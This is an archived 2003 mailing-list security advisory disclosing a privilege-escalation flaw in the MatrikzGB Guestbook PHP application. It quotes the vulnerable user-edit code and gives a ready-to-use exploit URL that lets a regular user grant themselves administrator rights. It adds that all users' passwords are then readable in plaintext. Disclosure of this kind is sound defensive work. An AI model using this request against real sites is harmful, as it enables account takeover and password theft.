Security hole in MatrikzGB

From: Stephan S. (mastamorphixxat_private)
Date: Fri Aug 15 2003 - 18:51:49 PDT

Next message: pageexecat_private: "Re: Buffer overflow prevention"

Previous message: Balwinder Singh: "Re: Need help. Proof of concept 100% security."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

('binary' encoding is not supported, stored as-is) Security hole in MatrikzGB Guestbook 15/8/2003 Vulnerable Versions: Version 2.0 and prior Version 3 (not tested) Summary: MatrikzGB was written by Thomas Hempel for www.onsite.org. A bug in index.php allows a user with a regular user account to give administrator rights to himself. Details: The bug is in the user edit function: Every regular user is allowed to chanche rights or do any modifications on existing users. if ($new_username != "" && $new_password != "") { create_user($new_username,$new_password,$new_rights,$entry_index); echo "<tr><th class=\"ok\">Der Benutzer wurde angelegt!"; Example: This is a example how to give administrator rights to yourself. http://www.target.com/php/gaestebuch/admin/index.php?do=options&action=optionsok&new_username=regularuser&new_password=regularpass&new_rights=admin&user=regularuser&pass=regularpass Comment: When you got administrator rights,you can look up the passwords of all other users,they are in plaintext. Vendor status: Vendor has been contacted. by Stephan "mastamorphixx" S. ,member of www.lostkey.org contact:mastamorphixxat_private irc.euirc.de #lostkey

Next message: pageexecat_private: "Re: Buffer overflow prevention"
Previous message: Balwinder Singh: "Re: Need help. Proof of concept 100% security."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Aug 18 2003 - 10:11:41 PDT